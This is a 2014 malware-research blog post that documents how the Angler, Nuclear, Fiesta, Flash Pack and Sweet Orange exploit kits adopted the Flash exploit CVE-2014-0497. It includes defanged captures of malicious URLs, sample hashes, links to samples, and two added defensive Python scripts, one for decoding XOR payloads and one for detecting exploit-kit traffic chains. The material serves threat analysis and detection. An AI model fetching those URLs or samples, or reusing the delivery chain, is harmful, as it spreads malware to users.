2014-02-27 - Exploit Integration
CVE-2014-0497 (Flash up to 12.0.0.43) integrating Exploit Kits
And here we are: the first CVE-2014-xxxx exploited in a blind mass attack. (I was expecting 0322, but maybe it is not that easy to implement.)
As spotted by EKWatcher, Angler EK is introducing today a new Flash exploit: CVE-2014-0497, identified by Timo Hirvonen from F-Secure. This vulnerability was found exploited in targeted attacks by Kaspersky and patched 22 days ago.
That exploit is more efficient than those previously found.
The samples covered by Microsoft and Kaspersky were not working properly on Flash 12.x,
but it looks like the coder of this exploit found a way to bypass the mitigation preventing execution on the 12.x branch.
Angler EK: 2014-02-26
CVE-2014-0497 successful pass in Angler EK from the ru8080 team: 2014-02-26 (note: the logo and name for Angler are not the "official" ones) |
GET http://phisoomythyxiboow .ru:8080/nf21cea1mg
200 OK (text/html)
Part of the landing after deobfuscation work (credits again to EKWatcher), giving hints on which CVE to expect. |
200 OK (text/html) 2a2136743be5be61b4e929b62a7a06ea CVE-2014-0497
Flash exploit opened in FFDec. Piece of code showing calls that do not look really "Anglerish". Remains of debugging? |
GET http://phisoomythyxiboow .ru:8080/EVUjxyPGW5p_MsLcWq12Y5HwY0gkVHSUamvyuIIBd4efHGTf
200 OK (application/octet-stream) Once decoded: 664e4383fcfe183edc04247f4d018e11 (GameOver Zeus)
Side notes:
- It's not just a XOR-ed payload. As Bryan Burns figured out, one byte is modified.
A XOR pass is not enough to get the actual payload. |
It seems the modified data is always the SizeOfOptionalHeader field (sample opened in PE Insider). |
I have no plan to search for the piece of code in charge of the modification. If you happen to work on it, I would be happy to hear about it.
- This CVE is not being served for now in "Reveton" Angler EK instances, despite the landing showing the upgrade.
Same VM, a few minutes between the two passes. Guess who is the VIP... |
It's now in Angler EK from the Reveton team too.
CVE-2014-0497 in Reveton Angler EK |
Files: Fiddler/sample (Owncloud via goo.gl)
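The side note above says the Angler payload is XOR-encoded and that, on top of that, one byte of the PE header is modified, apparently always inside the SizeOfOptionalHeader field. The script below is an added example (not code from the post, and not the kit's real encoding routine): it assumes a single-byte XOR key, decodes a constructed blob, reads IMAGE_FILE_HEADER.SizeOfOptionalHeader, compares it with the value implied by the optional header Magic (0xE0 for PE32, 0xF0 for PE32+), and restores it when it does not match. The PE stub, the key and the tampered value are all constructed for the demo.

```python
"""Decode a XOR-encoded payload and sanity-check / repair SizeOfOptionalHeader.

Added example, not code from the original post. Assumptions (labelled):
  - single-byte XOR key (the post does not document the real scheme);
  - the tampered field is IMAGE_FILE_HEADER.SizeOfOptionalHeader, as observed in the post;
  - the PE image below is a constructed header stub, not a real sample.
"""
import struct

# Expected SizeOfOptionalHeader for each IMAGE_OPTIONAL_HEADER.Magic (PE32 / PE32+).
EXPECTED_OPT_HEADER_SIZE = {0x10B: 0xE0, 0x20B: 0xF0}


def xor_decode(data: bytes, key: int) -> bytes:
    """Single-byte XOR pass (assumed key). XOR is symmetric, so this also encodes."""
    return bytes(b ^ key for b in data)


def pe_signature_offset(data: bytes) -> int:
    """Return e_lfanew after validating the MZ and PE\\0\\0 signatures."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found at e_lfanew")
    return e_lfanew


def size_of_optional_header_info(data: bytes):
    """Return (actual, expected, field_offset) for SizeOfOptionalHeader."""
    pe = pe_signature_offset(data)
    field_off = pe + 4 + 16            # IMAGE_FILE_HEADER.SizeOfOptionalHeader (WORD)
    actual = struct.unpack_from("<H", data, field_off)[0]
    magic = struct.unpack_from("<H", data, pe + 24)[0]   # IMAGE_OPTIONAL_HEADER.Magic
    return actual, EXPECTED_OPT_HEADER_SIZE.get(magic), field_off


def repair_size_of_optional_header(data: bytes):
    """Restore the field to the value implied by Magic. Returns (bytes, changed)."""
    actual, expected, off = size_of_optional_header_info(data)
    if expected is None or actual == expected:
        return data, False
    fixed = bytearray(data)
    struct.pack_into("<H", fixed, off, expected)
    return bytes(fixed), True


def build_minimal_pe32() -> bytes:
    """Constructed 32-bit PE header stub (DOS header + PE signature + headers only)."""
    dos = bytearray(b"MZ" + b"\x00" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew -> 0x40
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\x00" * (0xE0 - 2)   # Magic = PE32, rest zero
    return bytes(dos) + b"PE\x00\x00" + file_hdr + opt_hdr


def simulate_ek_encoding(pe: bytes, key: int) -> bytes:
    """Constructed stand-in for the kit's transform: tamper the field, then XOR."""
    _, _, off = size_of_optional_header_info(pe)
    tampered = bytearray(pe)
    struct.pack_into("<H", tampered, off, 0x00E1)      # arbitrary wrong value for the demo
    return xor_decode(bytes(tampered), key)


def decode_and_repair(blob: bytes, key: int):
    """Full analyst pass: XOR-decode, then fix SizeOfOptionalHeader if it is off."""
    return repair_size_of_optional_header(xor_decode(blob, key))


if __name__ == "__main__":
    original = build_minimal_pe32()
    blob = simulate_ek_encoding(original, 0x5A)
    restored, changed = decode_and_repair(blob, 0x5A)
    print("field repaired:", changed, "| matches original:", restored == original)
```

Run against a real decoded dump, the check simply reports what SizeOfOptionalHeader holds and whether it agrees with Magic; the repair is only safe when the post's observation (that this is the single modified field) holds for the sample at hand.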
Nuclear Pack: 2014-04-02
Thanks Symantec for help in confirmation.
Nuclear Pack CVE-2014-0497 Successful pass 2014-04-02 |
GET http://3d0ok0ay36113q97-7.canfut .ru/
200 OK (text/html)
NuclearPack landing. http://pastebin.com/bGgR8TKf The random background color is part of the obfuscation. Appeared around 2014-02-24 |
Small illustration of how the bgcolor is being used |
The js after deobfuscation : http://pastebin.com/dyckC40T
Here is the part we want to see :
Flash check (which in itself gives us a good indication of the bullet that might be shot) |
GET http://1785839722-7.canfut .ru/1396402140.htm
200 OK (text/html) <- CVE-2013-2551 (IE)
GET http://1785839722-7.canfut .ru/1396402140.swf
200 OK (application/x-shockwave-flash) 26e9cf4bf96d08f3c76038f80de9a14f
CVE-2014-0497/CVE-2013-0634 SWF with a lot of meaningful function names |
GET http://1785839722-7.canfut .ru/f/1396402140/7
200 OK (application/octet-stream) f6a019b1afffc51ca34c99c19fc6d350 (
Fiesta:
Not long after the CVE-2014-0322 integration, CVE-2014-0497 is now in Fiesta, as spotted by Brad here.
Thanks to Arseny Levin from Trustwave Labs and to Symantec for confirmation.
CVE-2014-0497 successful pass in Fiesta 2014-04-08 |
200 OK (text/html) http://pastebin.com/CGP6RhDV (beautified)
Landing after "Beautify" and adding deobfuscation comments |
GET http://cdryme.in .ua/xctl5j6/?21e9da56a4a8f02341460302565a060f010150025003050d0702510a07020001;120000;38
200 OK (application/x-shockwave-flash) CVE-2014-0497 eb343c450abd625d2119b98dcc0d62d7
Piece of CVE-2014-0497 from Fiesta |
GET http://cdryme.in .ua/xctl5j6/?0c0d9b4aab02c58a59065c5f0b5907580353055f0d00045a055004575a010156
200 OK (text/html) CVE-2013-2551
GET http://cdryme.in .ua/xctl5j6/?7b29a0345fb0c67054125902530b000d045207025552030f0251060a02530603;6
200 OK (application/octet-stream) Encoded payload is: Miuref fe0ffd0bbfaec31450d82c1b38ad0ffe
GET http://cdryme.in .ua/xctl5j6/?7b29a0345fb0c67054125902530b000d045207025552030f0251060a02530603;6;1
200 OK (text/html) Call back.
Files: Fiddler/Flash/Payload (OwnCloud)
FlashPack: 2014-04-13
CVE-2014-0497 successful pass in the "windigo gang" Flash Pack slot, 2014-04-16 (the monk image is the vendor's avatar on the forum; he names it Flash EK; it's a grandson of CritX Pack) |
200 OK (text/html)
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/js/pd.php?id=67636c6c31326e6f6e37796e6b78316674367967757a773931353935336231616131343938363336643839376234393435353930356164362e676563656b6979616665746c6572692e67656e2e7472
200 OK (text/html)
POST http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/json.php
200 OK (text/html)
Bullet chosen after the plugin detect: CVE-2013-2551 & CVE-2014-0497 |
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/msie.php
200 OK (text/html) CVE-2013-2551
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/flash2014.php
200 OK (text/html)
Call for exploit |
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/include/64a2f.swf
200 OK (application/x-shockwave-flash) ec80266e7b2f29232e25c6f0459ede6e CVE-2014-0497
Déjà vu? Yes. Nuclear Pack. |
It seems there are traces of CVE-2013-0634, but that exploit is not called that way in Flash Pack.
It's now flash2013.php > loadfla20013.php and another SWF.
GET http://gcll12non7ynkx1ft6yguzw.gecekiyafetleri.gen .tr/codex/georgin/loadfla20014.php
200 OK (application/octet-stream) d271fcae3a8c1b345e3afdc45af9188d No surprise here for this gang: Glupteba
(you may want to read the stellar paper from Eset on Operation Windigo; this Flash EK instance is what you get these days after a Cdorked-compromised server and a few redirects)
Files: FlashEK_CVE-2014-0497_140416.zip (OwnCloud via Goo.gl)
Sweet Orange:
I heard of it from Sebastien Duquette from Eset on April 16th and got it working with a Windows 7 VM.
The exploit is not being pushed to Windows XP.
GET http://raserkl15.ham .cx:9290/pda/family.php?space=282
200 OK (text/html)
GET http://raserkl15.ham .cx:9290/pda/ZgaGWW
200 OK (application/x-shockwave-flash)
CVE-2014-0497 in SWT, 2014-04-16. The implementation is exactly the same as the one seen in Nuclear. |
GET http://raserkl23.ham .cx:9290/action.php?ports=665&data=476&bios=4&howto=446&sports=171&lang=266&stats=765&feed=420&email=431
200 OK (application/octet-stream)
Fiddler: Here
You'll find a pcap in this post from 2014-04-20 from Malware-Traffic-Analysis.
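Every capture in this post shows the same shape: a landing page served as text/html, then the Flash exploit (usually application/x-shockwave-flash, sometimes served as text/html as in the Angler pass), then the payload as application/octet-stream, all from the same host within a few requests. The script below is an added example (not code from the post or from any of the kits) that turns that observation into a simple triage heuristic over request/response lines written in the same style as the Fiddler transcripts above. The log lines are constructed, with placeholder hosts and paths, not the ones from the post.

```python
"""Flag landing -> SWF -> octet-stream chains per host in a Fiddler-style transcript.

Added example, not code from the original post. The content-type sequence is the
pattern visible in the post's captures; the log below is constructed for the demo.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed transcript in the shape of the post's Fiddler captures (placeholder hosts).
SAMPLE_LOG = """\
GET http://landing.example.invalid:8080/nf21cea1mg
200 OK (text/html)
GET http://landing.example.invalid:8080/check.htm
200 OK (text/html)
GET http://landing.example.invalid:8080/1396402140.swf
200 OK (application/x-shockwave-flash)
GET http://landing.example.invalid:8080/f/1396402140/7
200 OK (application/octet-stream)
GET http://cdn.example.invalid/logo.png
200 OK (image/png)
GET http://cdn.example.invalid/app.swf
200 OK (application/x-shockwave-flash)
"""

REQUEST_RE = re.compile(r"^(GET|POST)\s+(\S+)")
RESPONSE_RE = re.compile(r"^(\d{3})\s+\S+\s+\(([^)]+)\)")

# Ordered content types that make up an exploit-kit chain in the post's captures.
# Matched as an ordered subsequence per host, so extra requests in between do not break it.
CHAIN = ("text/html", "application/x-shockwave-flash", "application/octet-stream")


def parse_transactions(text: str):
    """Pair each request line with the response line that follows it."""
    transactions, pending = [], None
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            pending = (m.group(1), m.group(2))
            continue
        m = RESPONSE_RE.match(line)
        if m and pending:
            method, url = pending
            transactions.append({
                "method": method,
                "url": url,
                "host": urlsplit(url).netloc,
                "status": int(m.group(1)),
                "ctype": m.group(2).lower(),
            })
            pending = None
    return transactions


def find_ek_chains(transactions):
    """Return [(host, [urls...])] for hosts whose 200 responses contain CHAIN in order."""
    by_host = defaultdict(list)
    for t in transactions:
        if t["status"] == 200:
            by_host[t["host"]].append(t)
    hits = []
    for host, seq in by_host.items():
        step, matched = 0, []
        for t in seq:
            if t["ctype"] == CHAIN[step]:
                matched.append(t["url"])
                step += 1
                if step == len(CHAIN):
                    hits.append((host, matched))
                    break
    return hits


if __name__ == "__main__":
    for host, urls in find_ek_chains(parse_transactions(SAMPLE_LOG)):
        print(f"possible EK chain on {host}:")
        for u in urls:
            print("   ", u)
```

A chain hit is a triage signal, not a verdict: plenty of legitimate sites serve an HTML page, a Flash file and a download from one host. The value is in narrowing a capture down to the handful of hosts worth pulling the SWF and the octet-stream from, which is exactly the order the post walks through for each kit.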
Read more:
CVE-2014-0497 – a 0-day vulnerability - Vyacheslav Zakorzhevsky - Kaspersky - 2014-02-05
A journey to CVE-2014-0497 exploit - Chun Feng - MMPC - 2014-02-17